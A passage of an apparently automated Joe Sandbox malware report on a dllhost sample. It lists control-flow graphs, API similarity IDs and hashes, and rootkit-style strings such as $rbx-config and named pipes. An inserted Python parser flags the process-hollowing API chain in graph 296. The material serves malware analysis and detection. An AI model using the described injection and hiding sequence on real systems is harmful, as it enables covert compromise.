140001868 * 2 265->273 274 140003629-14000362b 266->274 275 14000362d-140003635 266->275 270->221 278 1400034cc-14000350a GetProcessHeap HeapAlloc ReadFile 270->278 271->221 273->221 274->275 281 140003639 call 140001eec 274->281 275->266 282 140003637 275->282 277->221 278->258 284 140003510-14000351c 278->284 281->258 282->258 284->258 287 140003522-14000352f call 140002434 284->287 287->258
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
• String ID: $rbx-dll32$$rbx-dll64$$rbx-stager$$rbx-svc32$$rbx-svc64$SOFTWARE$open
• API String ID: 4225498131-1538754800
• Opcode ID: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
• Instruction ID: 6e35c32a62d70e7d93f4307674840714c013e8363098979e1a8d92760cac109a
• Opcode Fuzzy Hash: 736ca42babcb8c521872a82743edff672a2e6888472d9d1dca7c806dbabe5d2e
• Instruction Fuzzy Hash: 00B1EAF1204A8196EB77DF27B8643E923A9F74D7C4F408125BB4A47AB9DF398645C700

Control-flow Graph
                                                                                                                                                          control_flow_graph 296 140002434-140002469 297 140002911 296->297 298 14000246f-14000247b 296->298 301 140002913-14000292d 297->301 299 140002493 298->299 300 14000247d-140002487 298->300 303 140002496-140002499 299->303 300->297 302 14000248d-140002491 300->302 302->303 304 1400024d4 303->304 305 14000249b-1400024b6 call 1400020cc 303->305 306 1400024d7-140002532 CreateProcessW 304->306 305->297 322 1400024bc-1400024c7 305->322 308 1400028d7-1400028df 306->308 309 140002538-14000254f 306->309 311 1400028e1-1400028ef OpenProcess 308->311 312 1400028fc-140002903 308->312 313 140002555-14000258f call 1400020cc VirtualAllocEx 309->313 314 140002730-140002767 call 1400020cc VirtualAllocEx 309->314 311->312 315 1400028f1-1400028f6 TerminateProcess 311->315 312->297 317 140002905-14000290c 312->317 313->308 326 140002595-1400025b1 WriteProcessMemory 313->326 314->308 327 14000276d-140002789 WriteProcessMemory 314->327 315->312 317->306 322->297 323 1400024cd 322->323 323->304 326->308 328 1400025b7-1400025dc VirtualProtectEx 326->328 327->308 329 14000278f-1400027b3 VirtualProtectEx 327->329 328->308 331 1400025e2-1400025f0 328->331 329->308 330 1400027b9-1400027c7 329->330 332 140002858-140002877 VirtualAlloc 330->332 333 1400027cd 330->333 334 140002682-1400026a1 VirtualAlloc 331->334 335 1400025f6 331->335 332->308 338 140002879-14000288f Wow64GetThreadContext 332->338 336 1400027d0-1400027f2 WriteProcessMemory 333->336 334->308 337 1400026a7-1400026be GetThreadContext 334->337 339 1400025f9-14000261b WriteProcessMemory 335->339 340 1400028d5 336->340 341 1400027f8-140002803 336->341 337->308 342 1400026c4-1400026e9 WriteProcessMemory 337->342 338->308 343 140002891-1400028b4 WriteProcessMemory 338->343 339->340 344 140002621-14000262c 339->344 340->308 345 140002805-140002809 341->345 346 14000280b 341->346 342->308 
347 1400026ef-14000270c SetThreadContext 342->347 343->308 348 1400028b6-1400028ca Wow64SetThreadContext 343->348 349 140002634 344->349 350 14000262e-140002632 344->350 351 14000280f-14000283e call 140002930 VirtualProtectEx 345->351 346->351 347->308 352 140002712-140002720 ResumeThread 347->352 348->340 353 140002638-140002665 call 140002930 VirtualProtectEx 349->353 350->353 351->340 360 140002844-140002852 351->360 352->308 356 140002726-14000272b 352->356 353->340 359 14000266b-14000267c 353->359 356->301 359->334 359->339 360->332 360->336
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$AddressCreateHandleModuleOpenProcResumeTerminate
• String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
• API String ID: 1036100660-1371749706
• Opcode ID: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
• Instruction ID: 2cc4599025b35cf826ffc418a6ccceb484f0f008c335a408c33283198f0c2c0b
• Opcode Fuzzy Hash: fd1195e2308bccc300b2ff8f21b2c4cfd69eb2883e391b150e12868519e03b4e
• Instruction Fuzzy Hash: DAD15DB6705A8187EB65CF63F84479AB7A0F788BC4F004025EB8A47BA4DF78D595CB04
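
Added example, not code from the Joe Sandbox report or from the analysed sample: a parser for the flattened control_flow_graph listings on this page (graph 95 for function 140001868, which allocates and writes into another process, and graph 296 for function 140002434, where CreateProcessW is followed by VirtualAllocEx, WriteProcessMemory, Get/SetThreadContext and ResumeThread, the sequence associated with process hollowing), plus a search that tests whether an API chain occurs in order along some path from a block. The node and edge syntax is inferred from the listings above and is an assumption, not a documented format; the embedded input is a trimmed copy of graph 296, and HOLLOWING_CHAIN is the classic ordering chosen here, not something the report states.

```python
"""Parse the flattened control_flow_graph edge lists that Joe Sandbox prints for
each disassembled function, and check whether an API chain occurs along a path.
Added example for triaging reports like this one; it is not part of the Joe
Sandbox report or of the analysed sample. The syntax handled is inferred from
the text of this report (an assumption, not a documented format):
    <id> <hex-start>[-<hex-end>] [API ...] [call <hex-target> [* <n>]] ...
    <src>-><dst>
"""
import re
from collections import deque

_EDGE = re.compile(r"^(\d+)->(\d+)$")
# Block ids are small decimals and addresses are long hex values, so a decimal
# token followed by a 6+ hex-digit token opens a new basic block.
_ADDR = re.compile(r"^[0-9a-f]{6,}(?:-[0-9a-f]{6,})?$")

# Trimmed copy of graph 296 (function 140002434) from this report: the path
# CreateProcessW -> VirtualAllocEx -> WriteProcessMemory -> SetThreadContext ->
# ResumeThread is kept, the Wow64 branch and the error exits are dropped.
SAMPLE_CFG = """
control_flow_graph 296 140002434-140002469 297 140002911 296->297
298 14000246f-14000247b 296->298 301 140002913-14000292d 297->301
299 140002493 298->299 303 140002496-140002499 299->303 304 1400024d4 303->304
305 14000249b-1400024b6 call 1400020cc 303->305
306 1400024d7-140002532 CreateProcessW 304->306 305->297
308 1400028d7-1400028df 306->308 309 140002538-14000254f 306->309
313 140002555-14000258f call 1400020cc VirtualAllocEx 309->313
326 140002595-1400025b1 WriteProcessMemory 313->326
328 1400025b7-1400025dc VirtualProtectEx 326->328 331 1400025e2-1400025f0 328->331
334 140002682-1400026a1 VirtualAlloc 331->334 337 1400026a7-1400026be GetThreadContext 334->337
342 1400026c4-1400026e9 WriteProcessMemory 337->342
347 1400026ef-14000270c SetThreadContext 342->347
352 140002712-140002720 ResumeThread 347->352
356 140002726-14000272b 352->356 356->301
"""

# Process-hollowing order. Other calls (VirtualProtectEx, GetThreadContext, a
# second WriteProcessMemory) may sit in between; the search allows that.
HOLLOWING_CHAIN = ["CreateProcessW", "VirtualAllocEx", "WriteProcessMemory",
                   "SetThreadContext", "ResumeThread"]


def parse_cfg(text):
    """Return (nodes, edges): nodes maps block id -> labels in listing order
    ("call <target>" for static calls, the API name otherwise); edges maps
    block id -> successor ids."""
    tokens = text.replace("control_flow_graph", " ").split()
    nodes, edges, current, i = {}, {}, None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = _EDGE.match(tok)
        if m:
            src, dst = int(m.group(1)), int(m.group(2))
            edges.setdefault(src, []).append(dst)
            nodes.setdefault(src, [])
            nodes.setdefault(dst, [])
            i += 1
            continue
        if tok.isdigit() and i + 1 < len(tokens) and _ADDR.match(tokens[i + 1]):
            current = int(tok)  # "<id> <addr>" opens a new basic block
            nodes.setdefault(current, [])
            i += 2
            continue
        if current is None:
            raise ValueError("label %r appears before any block" % tok)
        if tok == "call" and i + 1 < len(tokens):
            label = "call " + tokens[i + 1]
            i += 2
            count = 1  # "call X * n" stands for n calls to X in this block
            if i + 1 < len(tokens) and tokens[i] == "*" and tokens[i + 1].isdigit():
                count = int(tokens[i + 1])
                i += 2
            nodes[current].extend([label] * count)
            continue
        nodes[current].append(tok)
        i += 1
    return nodes, edges


def chain_on_path(nodes, edges, start, chain):
    """True if the labels in `chain` occur in that order, with other calls
    possibly interleaved, on some path from `start`. The BFS state is
    (block, matched-prefix-length), so loops in the graph terminate."""
    seen, queue = set(), deque([(start, 0)])
    while queue:
        node, k = queue.popleft()
        if (node, k) in seen:
            continue
        seen.add((node, k))
        for label in nodes.get(node, []):
            if k < len(chain) and label == chain[k]:
                k += 1
        if k == len(chain):
            return True
        queue.extend((nxt, k) for nxt in edges.get(node, []))
    return False
```

Graph 95 can be fed to the same functions by pasting its listing into parse_cfg; note that its listing shows a static call 140002bfc between WriteProcessMemory and WaitForSingleObject rather than an imported thread-creation API, so a chain such as OpenProcess, VirtualAllocEx, WriteProcessMemory, WaitForSingleObject, VirtualFreeEx must not require one. The search is a subsequence match, which is deliberate: sandbox listings omit calls resolved through GetProcAddress (NtUnmapViewOfSection appears only in the string list above), so a chain that demanded adjacency would miss the pattern.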

Control-flow Graph
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
• Opcode ID: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
• Instruction ID: 9172d928bd221ff1096d4d6b158f49becdf828e9a984a0b33df103b3ad9988b4
• Opcode Fuzzy Hash: 52c6d37a2af4a1d6a0e24c1d193143f06bb7b356f12ba86b493c37bc12672881
• Instruction Fuzzy Hash: 765138B2604B8086EB16DF62F4483AA77A1F79CBD9F444124EB4A07B78DF38C555C710

Control-flow Graph
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValue
• String ID: SOFTWARE\$rbx-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 3993315683-3414887735
• Opcode ID: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
• Instruction ID: 0bd1eed236b6321b202bdd9012a21668a5814f2879643e8febc2c05628ee43d5
• Opcode Fuzzy Hash: ae2cb63a08c00f37da9eb0e616e317ce87cbb245c55dcd9753d322b5e5e56f75
• Instruction Fuzzy Hash: 0171D3B6310A5086EB22EF66F8507D923A4FB88BC8F016125FB4D97A7ADE38C554C744

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
• String ID: M$\\.\pipe\$rbx-childproc
• API String ID: 2203880229-2840927681
• Opcode ID: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
• Instruction ID: 2fb808d8c0fa1e0908606fb17de5b970416f6dc98e2db846ceffa582aa456b5d
• Opcode Fuzzy Hash: d0165abbce705caac342610e0fae3c6613993ee0f9e2c254021f88293e17d979
• Instruction Fuzzy Hash: B91139F1218A8482E726DB23F8043E9A764A78DBE0F444225BB6A436F9DF7CC548C704

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
• String ID:
• API String ID: 4184240511-0
• Opcode ID: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
• Instruction ID: e7c2dfd052af18fd3abcefe0f72c8446b9113f84b0d7c840ae7e34f71e75c1d0
• Opcode Fuzzy Hash: c322ffdba1650a2f2ae2605316e9b34693b952877218ba9b1551f4330c074e45
• Instruction Fuzzy Hash: FF4146B2704A859AE711CF6AF8443DD63B1FB89B99F445225BF0A43A69DF38C159C304

Control-flow Graph: function 14000104c-1400011d0 (basic blocks 404-416); API calls by block: RegQueryInfoKeyW (14000104c), RegEnumValueW (1400010cf), GetProcessHeap / HeapAlloc / GetProcessHeap / HeapFree (14000114e)

APIs
Strings
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
• Opcode ID: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
• Instruction ID: 03f89dd543fa71545bde49b2618b44e89e47b203f0d8546e2499baea92addc30
• Opcode Fuzzy Hash: 435c76a4378829ae359b2b91fc268e6eea08dc0b264376e4228dac23cbb25988
• Instruction Fuzzy Hash: D1412AB2614B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40

Control-flow Graph: function 1400017a8-140001866 (basic blocks 417-422); API calls by block: RegOpenKeyExW (1400017a8), RegDeleteKeyExW (140001841), RegEnumKeyExW (1400017f3), RegDeleteKeyW (1400017e8), RegCloseKey (14000183b)

APIs
Strings
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Delete$CloseEnumOpen
• String ID: SOFTWARE\$rbx-config
• API String ID: 3013565938-3990243012
• Opcode ID: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
• Instruction ID: 8421849941bfc07d5c6a41991bb422c7bbd6d954f4ecfba192073c561d1589c4
• Opcode Fuzzy Hash: 5400bf53effbf6b262c010f5037711af52f170679b47dd7329b1738abdbb04b9
• Instruction Fuzzy Hash: 301186B2614A8485E761CF26F8447D923B4F78C7D8F405205E75D0BAA9DF7CC258CB19

Control-flow Graph: function 140002cb0-140002d35 (basic blocks 423-433); calls by block: call 140002300 (140002cbd), Sleep (140002cd2), ConnectNamedPipe (140002cdd), Sleep (140002d21), ReadFile (140002cec), DisconnectNamedPipe (140002d2c)

APIs
Strings
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
• String ID: \\.\pipe\$rbx-control
• API String ID: 2071455217-3647231676
• Opcode ID: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
• Instruction ID: 2fc089305b625fd554036cd80c6cb28bc5e3d827a9ce39b23356f380729c3a5f
• Opcode Fuzzy Hash: 13c250ee6af2f53f1ae13243be044548fb926b5294e6b09330778d5fdc3bad2d
• Instruction Fuzzy Hash: 8B011AB1214A0482FB16DB23F8547E9A360A79DBE1F144225FB67436F5DF78C948C704
APIs
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
• String ID:
• API String ID: 3197395349-0
• Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
• Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
• Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
• Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44
APIs
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$AllocProcess$EnumProcessesSleep
• String ID:
• API String ID: 3676546796-0
• Opcode ID: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
• Instruction ID: a6189abee9d4784d5a048b00fbef5fbb6685315bc6f537058aeec4b09c4bf2e6
• Opcode Fuzzy Hash: 024d52d6f90a11a1aeae588e1dd8838628c4d8da57bc26401303b463d71a9915
• Instruction Fuzzy Hash: 2B1190F270461186E72ACB17F85479A7665F7C8BC1F148028EB4607B78CF3AC880CB00
APIs
Memory Dump Source
• Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
Similarity
• API ID: Heap$Process$Free
• String ID:
• API String ID: 3168794593-0
• Opcode ID: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
• Instruction ID: 5a1011d9486e765d7ba40cc25435cd7167fae03bd1d0927e1cf3db12c06e0eeb
• Opcode Fuzzy Hash: ba5f53336e6612f67f84370bf05ece9e08de79f6dc7f5e86e37cd44739219e00
                                                                                                                                                          • Instruction Fuzzy Hash: 2A0132B2610A808AE705EF67B80438977A0F78CFC0F4A4525FB5953B39CE38D091C744
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                          • String ID: ntdll.dll
                                                                                                                                                          • API String ID: 1646373207-2227199552
                                                                                                                                                          • Opcode ID: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction ID: 17fa8e42c722db624f1936625922d1a8ab69534039b48c71a9bb0a293c881c2b
                                                                                                                                                          • Opcode Fuzzy Hash: 0017c025cb5e8a7c9b0335d05a9c08c4f9d8e31f703f37c02c29db0b138d9ce4
                                                                                                                                                          • Instruction Fuzzy Hash: CAD0C9F8B1260182EF1AEB6778553E152515B6DBC9F4940209F0647772DE38C0E48318
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction ID: 6e91e1ae57bb2f507bdd30ccb813d710b9eda330d3ff7d449275dd8231ce62c3
                                                                                                                                                          • Opcode Fuzzy Hash: c7a43bef6df9d8d05703a7189659e0aa7f0603dabacb6fa5d63025371af7a52a
                                                                                                                                                          • Instruction Fuzzy Hash: EBE032F1B41A0086E709DB63E80838936E1EB9CB85F898024AA0907371DF7D85D98B90
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000005F.00000002.2206797378.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 0000005F.00000002.2206717829.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2206901922.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          • Associated: 0000005F.00000002.2207067074.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_95_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                          • Opcode ID: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction ID: a4bc93d2c7b124559308cf7a4161fd93bc4ab92d57e3b019964b2e6119ad9c46
                                                                                                                                                          • Opcode Fuzzy Hash: 63251503df5c7392b59882377b05ff3c407c5ffe99838fad78ad3d93c79eabbc
                                                                                                                                                          • Instruction Fuzzy Hash: B7E0EDF1B5150086E709DB63E84439976A1FB9CB55F858024DA1907731DE3885D58654
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LibraryLoad
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1029625771-0
                                                                                                                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction ID: 4686274220722fda45750febc74a8211f54cc4b085de23b653408301a5e5dad7
                                                                                                                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                                                                                                                          • Instruction Fuzzy Hash: 7891467BB21A9087DB608F25D40876DFB91F705F94F548128DE8A4BB98DF38DA02C741
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                          • API String ID: 849930591-393685449
                                                                                                                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction ID: 00f68f4f3844fcd8c5fa50feb29b8af00966feac8dba22e12a7accca49031d0d
                                                                                                                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                                                                                                                          • Instruction Fuzzy Hash: B5D1707BB24B408BEB609F65D44839DBBA0F757B98F104219DE8A5BB95DF34C180C782
                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 190073905-0
                                                                                                                                                          • Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction ID: 723e41556938cb520cd3acbfcb1a8de5a0e77ec4e10a763b86a2d3b792f1cc6d
                                                                                                                                                          • Opcode Fuzzy Hash: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
                                                                                                                                                          • Instruction Fuzzy Hash: E981AB2B724E4147FE54AB259849399EA90FB97F80F44402D9D4B4FF96DF38C842C78A
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
